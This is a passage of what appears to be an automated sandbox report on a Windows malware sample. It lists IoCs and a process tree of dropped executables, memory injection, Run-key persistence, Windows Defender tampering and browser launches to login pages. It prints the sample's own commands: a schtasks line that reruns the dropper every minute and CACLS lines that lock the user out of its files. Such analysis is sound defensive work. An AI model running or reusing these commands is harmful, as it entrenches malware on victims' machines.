Token: SeCreatePagefilePrivilege	1980	Explorer.EXE
Token: SeShutdownPrivilege	1980	Explorer.EXE
Token: SeCreatePagefilePrivilege	1980	Explorer.EXE

Suspicious use of FindShellTrayWindow 25 IoCs

pid	Process
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe

Suspicious use of SendNotifyMessage 24 IoCs

pid	Process
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe
3360	msedge.exe

Suspicious use of UnmapMainImage 1 IoCs

pid	Process
1980	Explorer.EXE

Suspicious use of WriteProcessMemory 64 IoCs

description	pid	Process	procid_target
PID 2188 wrote to memory of 4600	2188	file.exe	86
PID 2188 wrote to memory of 4600	2188	file.exe	86
PID 2188 wrote to memory of 4600	2188	file.exe	86
PID 4600 wrote to memory of 2808	4600	bH1gI10.exe	87
PID 4600 wrote to memory of 2808	4600	bH1gI10.exe	87
PID 4600 wrote to memory of 2808	4600	bH1gI10.exe	87
PID 2808 wrote to memory of 1124	2808	AT1uN32.exe	88
PID 2808 wrote to memory of 1124	2808	AT1uN32.exe	88
PID 2808 wrote to memory of 1124	2808	AT1uN32.exe	88
PID 1124 wrote to memory of 4380	1124	Fu7AL29.exe	89
PID 1124 wrote to memory of 4380	1124	Fu7AL29.exe	89
PID 1124 wrote to memory of 4380	1124	Fu7AL29.exe	89
PID 4380 wrote to memory of 4112	4380	1Ts56eD6.exe	91
PID 4380 wrote to memory of 4112	4380	1Ts56eD6.exe	91
PID 4380 wrote to memory of 4112	4380	1Ts56eD6.exe	91
PID 4380 wrote to memory of 4112	4380	1Ts56eD6.exe	91
PID 4380 wrote to memory of 4112	4380	1Ts56eD6.exe	91
PID 4380 wrote to memory of 4112	4380	1Ts56eD6.exe	91
PID 4380 wrote to memory of 4112	4380	1Ts56eD6.exe	91
PID 4380 wrote to memory of 4112	4380	1Ts56eD6.exe	91
PID 1124 wrote to memory of 2804	1124	Fu7AL29.exe	95
PID 1124 wrote to memory of 2804	1124	Fu7AL29.exe	95
PID 1124 wrote to memory of 2804	1124	Fu7AL29.exe	95
PID 2804 wrote to memory of 1048	2804	2Cj8454.exe	99
PID 2804 wrote to memory of 1048	2804	2Cj8454.exe	99
PID 2804 wrote to memory of 1048	2804	2Cj8454.exe	99
PID 2804 wrote to memory of 1048	2804	2Cj8454.exe	99
PID 2804 wrote to memory of 1048	2804	2Cj8454.exe	99
PID 2804 wrote to memory of 1048	2804	2Cj8454.exe	99
PID 2804 wrote to memory of 1048	2804	2Cj8454.exe	99
PID 2804 wrote to memory of 1048	2804	2Cj8454.exe	99
PID 2804 wrote to memory of 1048	2804	2Cj8454.exe	99
PID 2804 wrote to memory of 1048	2804	2Cj8454.exe	99
PID 2808 wrote to memory of 2020	2808	AT1uN32.exe	106
PID 2808 wrote to memory of 2020	2808	AT1uN32.exe	106
PID 2808 wrote to memory of 2020	2808	AT1uN32.exe	106
PID 2020 wrote to memory of 4968	2020	3jI92EC.exe	108
PID 2020 wrote to memory of 4968	2020	3jI92EC.exe	108
PID 2020 wrote to memory of 4968	2020	3jI92EC.exe	108
PID 2020 wrote to memory of 4968	2020	3jI92EC.exe	108
PID 2020 wrote to memory of 4968	2020	3jI92EC.exe	108
PID 2020 wrote to memory of 4968	2020	3jI92EC.exe	108
PID 4600 wrote to memory of 2344	4600	bH1gI10.exe	111
PID 4600 wrote to memory of 2344	4600	bH1gI10.exe	111
PID 4600 wrote to memory of 2344	4600	bH1gI10.exe	111
PID 2344 wrote to memory of 624	2344	4Xj539Ng.exe	115
PID 2344 wrote to memory of 624	2344	4Xj539Ng.exe	115
PID 2344 wrote to memory of 624	2344	4Xj539Ng.exe	115
PID 2344 wrote to memory of 2396	2344	4Xj539Ng.exe	116
PID 2344 wrote to memory of 2396	2344	4Xj539Ng.exe	116
PID 2344 wrote to memory of 2396	2344	4Xj539Ng.exe	116
PID 2344 wrote to memory of 2396	2344	4Xj539Ng.exe	116
PID 2344 wrote to memory of 2396	2344	4Xj539Ng.exe	116
PID 2344 wrote to memory of 2396	2344	4Xj539Ng.exe	116
PID 2344 wrote to memory of 2396	2344	4Xj539Ng.exe	116
PID 2344 wrote to memory of 2396	2344	4Xj539Ng.exe	116
PID 2188 wrote to memory of 3884	2188	file.exe	120
PID 2188 wrote to memory of 3884	2188	file.exe	120
PID 2188 wrote to memory of 3884	2188	file.exe	120
PID 3884 wrote to memory of 348	3884	5Rz2Qy4.exe	122
PID 3884 wrote to memory of 348	3884	5Rz2Qy4.exe	122
PID 348 wrote to memory of 3360	348	cmd.exe	125
PID 348 wrote to memory of 3360	348	cmd.exe	125
PID 3360 wrote to memory of 4224	3360	msedge.exe	126

Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
persistence

Query Registry
T1012

C:\Windows\Explorer.EXE
C:\Windows\Explorer.EXE
1⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: GetForegroundWindowSpam
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of UnmapMainImage
PID:1980
- C:\Users\Admin\AppData\Local\Temp\file.exe
  "C:\Users\Admin\AppData\Local\Temp\file.exe"
  2⤵
  - Adds Run key to start application
  - Suspicious use of WriteProcessMemory
  PID:2188
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bH1gI10.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\bH1gI10.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    - Suspicious use of WriteProcessMemory
    PID:4600
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\AT1uN32.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\AT1uN32.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      Suspicious use of WriteProcessMemory
      PID:2808
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Fu7AL29.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\Fu7AL29.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        Suspicious use of WriteProcessMemory
        
        PID:1124
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Ts56eD6.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\1Ts56eD6.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:4380
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        Modifies Windows Defender Real-time Protection settings
        Suspicious behavior: EnumeratesProcesses
        Suspicious use of AdjustPrivilegeToken
        
        PID:4112
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4380 -s 140
        7⤵
        Program crash
        
        PID:3796
      - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Cj8454.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\2Cj8454.exe
        6⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2804
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        7⤵
        
        PID:1048
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 1048 -s 540
        8⤵
        Program crash
        
        PID:1064
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2804 -s 152
        7⤵
        Program crash
        
        PID:3828
    - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3jI92EC.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\3jI92EC.exe
        5⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        Suspicious use of WriteProcessMemory
        
        PID:2020
      - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        6⤵
        Checks SCSI registry key(s)
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: MapViewOfSection
        
        PID:4968
      - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2020 -s 140
        6⤵
        Program crash
        
        PID:3320
  - - C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Xj539Ng.exe
      C:\Users\Admin\AppData\Local\Temp\IXP001.TMP\4Xj539Ng.exe
      4⤵
      Executes dropped EXE
      Suspicious use of SetThreadContext
      Suspicious use of WriteProcessMemory
      PID:2344
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:624
    - - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        5⤵
        
        PID:2396
    - - C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 2344 -s 152
        5⤵
        Program crash
        
        PID:2640
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5Rz2Qy4.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5Rz2Qy4.exe
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    - Suspicious use of WriteProcessMemory
    PID:3884
  - - C:\Windows\system32\cmd.exe
      "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\F7C.tmp\F7D.tmp\F7E.bat C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\5Rz2Qy4.exe"
      4⤵
      Suspicious use of WriteProcessMemory
      PID:348
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
        5⤵
        Enumerates system info in registry
        Suspicious behavior: EnumeratesProcesses
        Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
        Suspicious use of FindShellTrayWindow
        Suspicious use of SendNotifyMessage
        Suspicious use of WriteProcessMemory
        
        PID:3360
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x168,0x16c,0x170,0x148,0x174,0x7ffeb3f446f8,0x7ffeb3f44708,0x7ffeb3f44718
        6⤵
        
        PID:4224
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2248 /prefetch:2
        6⤵
        
        PID:3708
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2300 /prefetch:3
        6⤵
        
        PID:1100
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3200 /prefetch:1
        6⤵
        
        PID:2216
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2956 /prefetch:1
        6⤵
        
        PID:1448
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=2948 /prefetch:1
        6⤵
        
        PID:744
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2424 /prefetch:8
        6⤵
        
        PID:2152
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5032 /prefetch:1
        6⤵
        
        PID:1628
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5664 /prefetch:1
        6⤵
        
        PID:5140
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=10 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5652 /prefetch:1
        6⤵
        
        PID:5176
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=12 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6336 /prefetch:1
        6⤵
        
        PID:5384
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=11 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6308 /prefetch:1
        6⤵
        
        PID:5376
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=13 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=6680 /prefetch:1
        6⤵
        
        PID:6104
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=7068 /prefetch:1
        6⤵
        
        PID:5812
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3040 /prefetch:1
        6⤵
        
        PID:5804
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6552 /prefetch:8
        6⤵
        
        PID:4148
      - C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2144,17492945325657883833,1534993694643964911,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=6552 /prefetch:8
        6⤵
        
        PID:6072
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
        5⤵
        
        PID:2160
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0x160,0x164,0x168,0x13c,0x16c,0x7ffeb3f446f8,0x7ffeb3f44708,0x7ffeb3f44718
        6⤵
        
        PID:4628
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=1952,5282957500391716969,15798032131908119929,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2032 /prefetch:2
        6⤵
        
        PID:4116
      - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=1952,5282957500391716969,15798032131908119929,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2332 /prefetch:3
        6⤵
        Suspicious behavior: EnumeratesProcesses
        
        PID:2704
- C:\Users\Admin\AppData\Local\Temp\6915.exe
  C:\Users\Admin\AppData\Local\Temp\6915.exe
  2⤵
  - Executes dropped EXE
  - Adds Run key to start application
  PID:4792
- - C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cP1QA9tD.exe
    C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\cP1QA9tD.exe
    3⤵
    - Executes dropped EXE
    - Adds Run key to start application
    PID:3180
  - - C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rK2Hd6RC.exe
      C:\Users\Admin\AppData\Local\Temp\IXP002.TMP\rK2Hd6RC.exe
      4⤵
      Executes dropped EXE
      Adds Run key to start application
      PID:1644
    - - C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ip7bl9qN.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP003.TMP\ip7bl9qN.exe
        5⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3320
      - C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ny5xx7go.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP004.TMP\ny5xx7go.exe
        6⤵
        Executes dropped EXE
        Adds Run key to start application
        
        PID:3672
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1RC28Vm9.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\1RC28Vm9.exe
        7⤵
        Executes dropped EXE
        Suspicious use of SetThreadContext
        
        PID:4676
        
        C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
        
        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
        8⤵
        
        PID:5796
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 5796 -s 560
        9⤵
        Program crash
        
        PID:5972
        
        C:\Windows\SysWOW64\WerFault.exe
        
        C:\Windows\SysWOW64\WerFault.exe -u -p 4676 -s 584
        8⤵
        Program crash
        
        PID:5872
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2yq462Ma.exe
        
        C:\Users\Admin\AppData\Local\Temp\IXP005.TMP\2yq462Ma.exe
        7⤵
        Executes dropped EXE
        
        PID:6112
- C:\Users\Admin\AppData\Local\Temp\6AAD.exe
  C:\Users\Admin\AppData\Local\Temp\6AAD.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:388
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5704
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 388 -s 148
    3⤵
    - Program crash
    PID:5760
- C:\Users\Admin\AppData\Local\Temp\6C05.bat
  "C:\Users\Admin\AppData\Local\Temp\6C05.bat"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:3188
- - C:\Windows\system32\cmd.exe
    "C:\Windows\sysnative\cmd.exe" /c "C:\Users\Admin\AppData\Local\Temp\6CBF.tmp\6CC0.tmp\6CC1.bat C:\Users\Admin\AppData\Local\Temp\6C05.bat"
    3⤵
    PID:4632
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://accounts.google.com/
      4⤵
      PID:6012
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb3f446f8,0x7ffeb3f44708,0x7ffeb3f44718
        5⤵
        
        PID:6024
  - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://www.facebook.com/login
      4⤵
      PID:5720
    - - C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffeb3f446f8,0x7ffeb3f44708,0x7ffeb3f44718
        5⤵
        
        PID:1052
- C:\Users\Admin\AppData\Local\Temp\6EF4.exe
  C:\Users\Admin\AppData\Local\Temp\6EF4.exe
  2⤵
  - Executes dropped EXE
  - Suspicious use of SetThreadContext
  PID:3776
- - C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe"
    3⤵
    PID:5340
- - C:\Windows\SysWOW64\WerFault.exe
    C:\Windows\SysWOW64\WerFault.exe -u -p 3776 -s 236
    3⤵
    - Program crash
    PID:5528
- C:\Users\Admin\AppData\Local\Temp\70E9.exe
  C:\Users\Admin\AppData\Local\Temp\70E9.exe
  2⤵
  - Modifies Windows Defender Real-time Protection settings
  - Executes dropped EXE
  - Windows security modification
  - Suspicious use of AdjustPrivilegeToken
  PID:5128
- C:\Users\Admin\AppData\Local\Temp\7446.exe
  C:\Users\Admin\AppData\Local\Temp\7446.exe
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  PID:5268
- - C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe
    "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe"
    3⤵
    - Checks computer location settings
    - Executes dropped EXE
    PID:5356
  - - C:\Windows\SysWOW64\schtasks.exe
      "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN explothe.exe /TR "C:\Users\Admin\AppData\Local\Temp\fefffe8cea\explothe.exe" /F
      4⤵
      Creates scheduled task(s)
      PID:5540
  - - C:\Windows\SysWOW64\cmd.exe
      "C:\Windows\System32\cmd.exe" /k echo Y|CACLS "explothe.exe" /P "Admin:N"&&CACLS "explothe.exe" /P "Admin:R" /E&&echo Y|CACLS "..\fefffe8cea" /P "Admin:N"&&CACLS "..\fefffe8cea" /P "Admin:R" /E&&Exit
      4⤵
      PID:5576
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:5820
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:N"
        5⤵
        
        PID:5912
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "explothe.exe" /P "Admin:R" /E
        5⤵
        
        PID:6000
    - - C:\Windows\SysWOW64\cmd.exe
        
        C:\Windows\system32\cmd.exe /S /D /c" echo Y"
        5⤵
        
        PID:5292
    - - C:\Windows\SysWOW64\cacls.exe
        
        CACLS "..\fefffe8cea" /P "Admin:N"
        5⤵
        
        PID:5312
    - - C:\Windows\SysWOW64\cacls.exe
        
